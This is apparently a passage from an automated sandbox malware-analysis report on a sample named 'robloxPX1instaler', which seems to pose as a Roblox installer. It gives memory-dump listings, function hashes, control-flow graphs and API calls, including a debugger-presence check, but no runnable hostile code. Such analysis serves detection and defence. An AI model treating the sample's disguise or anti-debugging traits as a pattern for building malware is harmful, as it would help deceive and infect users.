                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8111f57d93fe4cee61e107a5636e9bfc093e822eac657fa522e79b6a5b5982ee
                                                                                  • Instruction ID: b91ca63975eabc139ea1accc5e61a32e8dc83a5dc79220634e66556490e785fd
                                                                                  • Opcode Fuzzy Hash: 8111f57d93fe4cee61e107a5636e9bfc093e822eac657fa522e79b6a5b5982ee
                                                                                  • Instruction Fuzzy Hash: 9E01D4337242255FDB168F6DEC46A5A73EAEB85360B285130F910EB198DF30D811E7B0
                                                                                  Function 00D3A4EA Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 76 d3a4ea-d3a4f6 77 d3a528-d3a533 call d1e672 76->77 78 d3a4f8-d3a4fa 76->78 86 d3a535-d3a537 77->86 79 d3a513-d3a524 RtlAllocateHeap 78->79 80 d3a4fc-d3a4fd 78->80 82 d3a526 79->82 83 d3a4ff-d3a506 call d39cb0 79->83 80->79 82->86 83->77 88 d3a508-d3a511 call d425ed 83->88 88->77 88->79
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00D2463C,00D3A27F,?,00D33C3D,00E4C588,00000018,00000003), ref: 00D3A51C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 5a6c8263b3ebfe0132dffcc4b8788cc38ac859c2aff1bd8ab692ff3f352bb457
                                                                                  • Instruction ID: 117523acdb5cc36e92d6e7ca7e2563a7266ee19d576d6693a6c6f06c0e8c7aa9
                                                                                  • Opcode Fuzzy Hash: 5a6c8263b3ebfe0132dffcc4b8788cc38ac859c2aff1bd8ab692ff3f352bb457
                                                                                  • Instruction Fuzzy Hash: 34E06D313412216BEA3127A99C15B6A7B8CDF527F1F190120EDD496190DFA0CD4186B3

                                                                                  Non-executed Functions

                                                                                  Function 00D1E378 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D1E470
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D1E47A
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D1E487
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 74855b912a28cd28f1758e2823f710844644456d845fe0faeab03778b7928d7f
                                                                                  • Instruction ID: 1277b12689c86fddcd479f5224293937025c5d81ca64abef87c22773261288dd
                                                                                  • Opcode Fuzzy Hash: 74855b912a28cd28f1758e2823f710844644456d845fe0faeab03778b7928d7f
                                                                                  • Instruction Fuzzy Hash: 3731B574901228ABCB21DF65E889BCDBBB4FF18310F5041DAE41CA7251EB749BC58F65
                                                                                  Function 00D3D13C Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                  • Instruction ID: 4b497eade63c6b0e2d40a8b430b350abfdc2fb51804a8f5684fc712f08e720d5
                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                  • Instruction Fuzzy Hash: BBE0EC72915278EBCB25DB9CD94598AF3EDEB45F50F5544A6B901E3151C270DE00CBE0
                                                                                  Function 00D343AC Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                  • Instruction ID: 0511280830731a3bdf21a8cd0796a3cba6983a6ef1757cb7d9c01133d28a3790
                                                                                  • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                  • Instruction Fuzzy Hash: 38C04C341C5E4047CE299914A3B17A93356E792782F98298CD9474B642C62EAC87DA31
                                                                                  Function 00D16350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 121 d16350-d163a1 call d4e1aa call d16310 call d172ec 128 d163a3-d163b5 121->128 129 d163fd-d16400 121->129 130 d16420-d16429 128->130 132 d163b7-d163ce 128->132 129->130 131 d16402-d1640f call d1dff0 129->131 137 d16414-d1641d call d16310 131->137 134 d163d0-d163de call d1df90 132->134 135 d163e4 132->135 144 d163e0 134->144 145 d163f4-d163fb 134->145 136 d163e7-d163ec 135->136 136->132 139 d163ee-d163f0 136->139 137->130 139->130 142 d163f2 139->142 142->137 146 d163e2 144->146 147 d1642a-d16433 144->147 145->137 146->136 148 d16435-d1643c 147->148 149 d1646d-d1647d call d1dfd0 147->149 148->149 151 d1643e-d1644d call d4dff0 148->151 155 d16491-d164b6 call d16310 call d1dfb0 149->155 156 d1647f-d1648e call d1dff0 149->156 157 d1646a 151->157 158 d1644f-d16467 151->158 166 d164c6-d164c7 155->166 167 d164b8-d164bd 155->167 156->155 157->149 158->157 167->166 169 d164bf-d164c0 call d231dc 167->169 171 d164c5 169->171 171->166
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16387
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1638F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16418
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D16443
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16498
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
